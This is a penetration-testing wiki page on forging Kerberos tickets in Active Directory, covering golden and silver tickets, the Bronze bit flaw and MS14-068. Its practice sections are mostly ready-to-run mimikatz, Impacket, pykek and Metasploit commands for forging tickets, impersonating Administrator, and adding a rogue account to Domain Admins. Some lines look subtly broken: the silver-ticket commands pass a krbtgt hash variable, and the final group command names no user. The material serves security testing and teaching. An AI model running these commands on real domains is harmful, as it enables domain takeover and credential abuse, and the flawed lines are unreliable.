Forged tickets

MITRE ATT&CK™ Sub-techniques T1558.001 and T1558.002

Theory

Silver and golden tickets are forged Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.

  • Golden ticket: The NT hash (or AES key) of the special account krbtgt can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain.

  • Silver ticket: The NT hash (or AES key) of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service

The Bronze bit vulnerability (CVE-2020-17049) introduced the possibility of forwarding service tickets when it shouldn't normally be possible (protected users, unconstrained delegation, constrained delegation configured with protocol transition).

🛠️ //TODO : MS14-068

Practice

The following parts allow to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.

Golden ticket

In order to craft a golden ticket, testers need to find the krbtgt's NT hash or AES key (128 or 256 bits). In most cases, this can only be achieved with domain admin privileges through a DCSync attack. Because of this, golden tickets only allow lateral movement and not privilege escalation.

Microsoft now uses AES 256 bits by default. Using this encryption algorithm (instead of giving the NThash) will be stealthier.

UNIX-like
Windows
UNIX-like

There are Impacket scripts for each step of a golden ticket creation : retrieving the krbtgt, retrieving the domain SID, creating the golden ticket.

# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
​
# Create the golden ticket (with an NT hash)
ticketer.py -nthash $krbtgtNThash -domain-sid $domainSID -domain $DOMAIN randomuser
​
# Create the golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Windows

On Windows, mimikatz (C) can be used for this attack.

# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt
​
# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt
​
# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt

For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Silver ticket

In order to craft a silver ticket, testers need to find the target service account's NT hash or AES key (128 or 256 bits).

"While the scope is more limited than Golden Tickets, the required hash is easier to get and there is no communication with a DC when using them, so detection is more difficult than Golden Tickets." (adsecurity.org)

UNIX-like
Windows
UNIX-like

The Impacket script ticketer can create silver tickets.

# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
​
# with an NT hash
python ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username
​
# with an AES (128 or 256 bits) key
python ticketer.py -aesKey $AESkey -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username

The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).

Windows

On Windows, mimikatz can be used to generate a silver ticket. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.

# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
​
# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
​
# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Bronze bit (CVE-2020-17049)

In order to exploit this vulnerability, attackers need to find a service able to delegate to another service (see Kerberos delegations), and they need that first service account NT hash or AES key (128 or 256 bits).

For example with constrained delegation set between a controlled service and a target one with protocol transition enabled and the target user being protected, the Impacket script getST (Python) can perform all the necessary steps to obtain the final "impersonating" TGS (in this case, "Administrator" is impersonated/delegated account but it can be any user in the environment).

The input credentials are those of the compromised service account configured with constrained delegations.

# with an NT hash
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account
​
# with an AES (128 or 256 bits) key
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -aesKey $Controlled_service_AES_key $Domain/$Controlled_service_account

The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).

MS14-068 (CVE-2014-6324)

This vulnerability allows attackers to forge a TGT with unlimited power (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the golden ticket, however, it doesn't require the attacker to know the krbtgt. This attack is a really powerful privilege escalation technique. However, it will not work on patched domain controllers.

pykek
metasploit
pykek

This attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.

# with a plaintext password
ms14-068.py -u 'USER'@'DOMAIN_FQDN' -p 'PASSWORD' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'
​
# with pass-the-hash
ms14-068.py -u 'USER'@'DOMAIN_FQDN' --rc4 'NThash' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'

If the attack is successful, the script will write a .ccache ticket that will be usable with pass-the-ticket.

metasploit

Using the Metasploit Framework can sometimes be more useful since it prints valuable error information.

msf6 > use admin/kerberos/ms14_068_kerberos_checksum

In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's kerberos:ptt command, and then create a new user and add it to the domain admins group.

net user "hacker" "132Pentest!!!" /domain /add
net group "Domain Admins" /domain /add

References

​